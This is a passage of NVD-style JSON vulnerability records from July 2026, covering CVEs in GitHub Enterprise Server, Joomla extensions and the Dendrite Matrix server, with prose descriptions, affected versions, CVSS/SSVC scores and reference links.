Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"help@fluidattacks.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://fluidattacks.com/advisories/kyokai","source":"help@fluidattacks.com"},{"url":"https://github.com/osTicket/osTicket/","source":"help@fluidattacks.com"},{"url":"https://github.com/osTicket/osTicket/releases/tag/v1.17.8","source":"help@fluidattacks.com"},{"url":"https://github.com/osTicket/osTicket/releases/tag/v1.18.4","source":"help@fluidattacks.com"},{"url":"https://medium.com/p/1abb8be847e6","source":"help@fluidattacks.com"}]}},{"cve":{"id":"CVE-2026-15007","sourceIdentifier":"product-cna@github.com","published":"2026-07-17T16:17:13.743","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A denial of service vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user to cause service disruption by supplying a repository release notes configuration file containing deeply nested YAML. When release notes were generated, the configuration file was parsed without a nesting depth limit, causing excessive resource consumption that could render the instance unresponsive. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.18, 3.18.12, 3.19.9, 3.20.5, and 3.21.3. This vulnerability was reported via the GitHub Bug Bounty program."}],"affected":[{"source":"product-cna@github.com","affectedData":[{"vendor":"GitHub","product":"Enterprise Server","defaultStatus":"affected","versions":[{"version":"3.17.0","lessThanOrEqual":"3.17.17","versionType":"semver","status":"affected","changes":[{"at":"3.17.18","status":"unaffected"}]},{"version":"3.18.0","lessThanOrEqual":"3.18.11","versionType":"semver","status":"affected","changes":[{"at":"3.18.12","status":"unaffected"}]},{"version":"3.19.0","lessThanOrEqual":"3.19.8","versionType":"semver","status":"affected","changes":[{"at":"3.19.9","status":"unaffected"}]},{"version":"3.20.0","lessThanOrEqual":"3.20.4","versionType":"semver","status":"affected","changes":[{"at":"3.20.5","status":"unaffected"}]},{"version":"3.21.0","lessThanOrEqual":"3.21.2","versionType":"semver","status":"affected","changes":[{"at":"3.21.3","status":"unaffected"}]}]}]}],"metrics":{"cvssMetricV40":[{"source":"product-cna@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"HIGH","exploitMaturity":"UNREPORTED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:35:53.532624Z","id":"CVE-2026-15007","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"product-cna@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.18","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.12","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.9","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.5","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.21/admin/release-notes#3.21.3","source":"product-cna@github.com"}]}},{"cve":{"id":"CVE-2026-15343","sourceIdentifier":"product-cna@github.com","published":"2026-07-17T16:17:13.917","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A path traversal vulnerability was identified in GitHub Enterprise Server that allowed an attacker who had code execution inside the Dependabot updater container to write files to arbitrary repository paths, including GitHub Actions workflow files under .github/workflows/ as the path validation did not check the effective path which the attacker could control through the dependency file's directory and symlink target. If the repository used a pull_request_target workflow or had auto-merge enabled, an injected workflow could execute with access to the repository's GitHub Actions secrets. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.21.3, 3.20.5, 3.19.9, 3.18.12, 3.17.18."}],"affected":[{"source":"product-cna@github.com","affectedData":[{"vendor":"GitHub","product":"Enterprise Server","defaultStatus":"affected","versions":[{"version":"3.17.0","lessThanOrEqual":"3.17.17","versionType":"semver","status":"affected","changes":[{"at":"3.17.18","status":"unaffected"}]},{"version":"3.18.0","lessThanOrEqual":"3.18.11","versionType":"semver","status":"affected","changes":[{"at":"3.18.12","status":"unaffected"}]},{"version":"3.19.0","lessThanOrEqual":"3.19.8","versionType":"semver","status":"affected","changes":[{"at":"3.19.9","status":"unaffected"}]},{"version":"3.20.0","lessThanOrEqual":"3.20.4","versionType":"semver","status":"affected","changes":[{"at":"3.20.5","status":"unaffected"}]},{"version":"3.21.0","lessThanOrEqual":"3.21.2","versionType":"semver","status":"affected","changes":[{"at":"3.21.3","status":"unaffected"}]}]}]}],"metrics":{"cvssMetricV40":[{"source":"product-cna@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:31:35.938532Z","id":"CVE-2026-15343","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"product-cna@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.18","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.12","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.9","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.5","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.21/admin/release-notes#3.21.3","source":"product-cna@github.com"}]}},{"cve":{"id":"CVE-2026-15783","sourceIdentifier":"product-cna@github.com","published":"2026-07-17T16:17:14.183","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A missing authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with write access to any repository to read metadata from private repositories they did not have access to, including private repository owners and names, branch names, commit SHAs, commit messages, and the pushing actor. The delegated bypass endpoint resolved a rule suite directly from an attacker-supplied, encoded identifier without verifying that the requesting user could read the rule suite's repository, and because these identifiers are sequential an attacker could enumerate them across the instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.18, 3.18.12, 3.19.9, 3.20.5, and 3.21.3. This vulnerability was reported via the GitHub Bug Bounty program."}],"affected":[{"source":"product-cna@github.com","affectedData":[{"vendor":"GitHub","product":"Enterprise Server","defaultStatus":"affected","versions":[{"version":"3.17.0","lessThanOrEqual":"3.17.17","versionType":"semver","status":"affected","changes":[{"at":"3.17.18","status":"unaffected"}]},{"version":"3.18.0","lessThanOrEqual":"3.18.11","versionType":"semver","status":"affected","changes":[{"at":"3.18.12","status":"unaffected"}]},{"version":"3.19.0","lessThanOrEqual":"3.19.8","versionType":"semver","status":"affected","changes":[{"at":"3.19.9","status":"unaffected"}]},{"version":"3.20.0","lessThanOrEqual":"3.20.4","versionType":"semver","status":"affected","changes":[{"at":"3.20.5","status":"unaffected"}]},{"version":"3.21.0","lessThanOrEqual":"3.21.2","versionType":"semver","status":"affected","changes":[{"at":"3.21.3","status":"unaffected"}]}]}]}],"metrics":{"cvssMetricV40":[{"source":"product-cna@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:54:15.772592Z","id":"CVE-2026-15783","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"product-cna@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.18","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.12","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.9","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.5","source":"product-cna@github.com"},{"url":"https://docs.github.com/en/enterprise-server@3.21/admin/release-notes#3.21.3","source":"product-cna@github.com"}]}},{"cve":{"id":"CVE-2026-58148","sourceIdentifier":"security@joomla.org","published":"2026-07-17T16:17:15.897","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The Joomla extension ChronoForms is vulnerable to an unauthenticated stored XSS vulnerability."}],"affected":[{"source":"security@joomla.org","affectedData":[{"vendor":"chronoengine.com","product":"ChronoForms extension for Joomla","defaultStatus":"unaffected","versions":[{"version":"1.0-8.0.52","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security@joomla.org","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:15:25.049733Z","id":"CVE-2026-58148","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@joomla.org","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://www.chronoengine.com/","source":"security@joomla.org"}]}},{"cve":{"id":"CVE-2026-58149","sourceIdentifier":"security@joomla.org","published":"2026-07-17T16:17:16.017","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The Joomla extension Events Booking is vulnerable to an unauthenticated user enumeration that allows to retrieve account usernames and email addresses."}],"affected":[{"source":"security@joomla.org","affectedData":[{"vendor":"joomdonation.com","product":"Events Booking extension for Joomla","defaultStatus":"unaffected","versions":[{"version":"1.0-5.8.0","status":"affected"}]}]}],"metrics":{},"references":[{"url":"https://joomdonation.com/joomla-extensions/events-booking-joomla-events-registration.html","source":"security@joomla.org"}]}},{"cve":{"id":"CVE-2026-60024","sourceIdentifier":"security@joomla.org","published":"2026-07-17T16:17:16.113","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The Joomla extension Events Booking prior version 5.8.0 did by default allow unauthenticated users to upload media assets."}],"affected":[{"source":"security@joomla.org","affectedData":[{"vendor":"joomdonation.com","product":"Events Booking extension for Joomla","defaultStatus":"unaffected","versions":[{"version":"1.0-5.8.0","status":"affected"}]}]}],"metrics":{},"weaknesses":[{"source":"security@joomla.org","type":"Primary","description":[{"lang":"en","value":"CWE-1188"}]}],"references":[{"url":"https://joomdonation.com/joomla-extensions/events-booking-joomla-events-registration.html","source":"security@joomla.org"}]}},{"cve":{"id":"CVE-2026-60025","sourceIdentifier":"security@joomla.org","published":"2026-07-17T16:17:16.230","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The Joomla extension Events Booking prior version 5.8.0 had an frontend file upload endpoint that lacked CSRF protection."}],"affected":[{"source":"security@joomla.org","affectedData":[{"vendor":"joomdonation.com","product":"Events Booking extension for Joomla","defaultStatus":"unaffected","versions":[{"version":"1.0-5.8.0","status":"affected"}]}]}],"metrics":{},"weaknesses":[{"source":"security@joomla.org","type":"Primary","description":[{"lang":"en","value":"CWE-352"}]}],"references":[{"url":"https://joomdonation.com/joomla-extensions/events-booking-joomla-events-registration.html","source":"security@joomla.org"}]}},{"cve":{"id":"CVE-2026-63095","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T16:17:16.467","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[{"sourceIdentifier":"disclosure@vulncheck.com","tags":["unsupported-when-assigned"]}],"descriptions":[{"lang":"en","value":"Dendrite through 0.13.8 contains an improper authorization vulnerability in the Matrix Client-Server API that allows any authenticated local user to delete third-party identifier bindings belonging to other users by submitting an arbitrary address and medium to the account deletion endpoint without ownership verification. Attackers can exploit the unverified Forget3PID handler to remove a victim's email or MSISDN binding and subsequently rebind the address through an identity server to hijack the victim's password reset flow."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"matrix-org","product":"dendrite","defaultStatus":"affected","repo":"https://github.com/matrix-org/dendrite","versions":[{"version":"0","lessThanOrEqual":"0.13.8","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T16:00:06.628835Z","id":"CVE-2026-63095","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://github.com/geo-chen/oss/blob/main/dendrite.md#finding-1-idor-in-post-account3piddelete-allows-any-authenticated-user-to-remove-any-other-users-third-party-identifier","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/dendrite-improper-authorization-via-post-account-3pid-delete-endpoint","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63096","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T16:17:16.630","lastModified":"2026-07-17T19:17:19.017","vulnStatus":"Deferred","cveTags":[{"sourceIdentifier":"disclosure@vulncheck.com","tags":["unsupported-when-assigned"]}],"descriptions":[{"lang":"en","value":"Dendrite through 0.13.8 contains a server-side request forgery vulnerability that allows unauthenticated attackers to cause the server to open outbound TLS connections to arbitrary hosts and ports by supplying an unvalidated serverName parameter to the legacy media download endpoint. Attackers can exploit distinguishable error response classes and leaked internal IP addresses in error messages to perform blind port scanning and enumerate internal network topology."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"matrix-org","product":"dendrite","defaultStatus":"affected","repo":"https://github.com/matrix-org/dendrite","versions":[{"version":"0","lessThanOrEqual":"0.13.8","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","baseScore":5.8,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:26:21.228229Z","id":"CVE-2026-63096","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/geo-chen/oss/blob/main/dendrite.md#finding-2-unauthenticated-ssrf-and-internal-port-scanner-via-legacy-_matrixmediar0download","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/dendrite-ssrf-via-unauthenticated-legacy-media-download-endpoint","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63097","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T16:17:16.783","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[{"sourceIdentifier":"disclosure@vulncheck.com","tags":["unsupported-when-assigned"]}],"descriptions":[{"lang":"en","value":"Dendrite through 0.13.8 contains an improper access control vulnerability in the syncapi /context endpoint (syncapi/routing/context.go) that allows authenticated local users to access post-leave room state events by exploiting a flawed membership check that evaluates only the RoomExists field while ignoring IsInRoom, HasBeenInRoom, and Membership fields. Attackers who have left a room can call the rooms context API endpoint for a previously permitted event and receive unfiltered current room state that the /messages and /sync endpoints correctly withhold."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"matrix-org","product":"dendrite","defaultStatus":"affected","repo":"https://github.com/matrix-org/dendrite","versions":[{"version":"0","lessThanOrEqual":"0.13.8","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/geo-chen/oss/blob/main/dendrite.md#finding-3-context-returns-current-room-state-to-non-members-and-left-users-history-visibility-bypass","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/dendrite-syncapi-context-endpoint-post-leave-state-exposure","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-63098","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-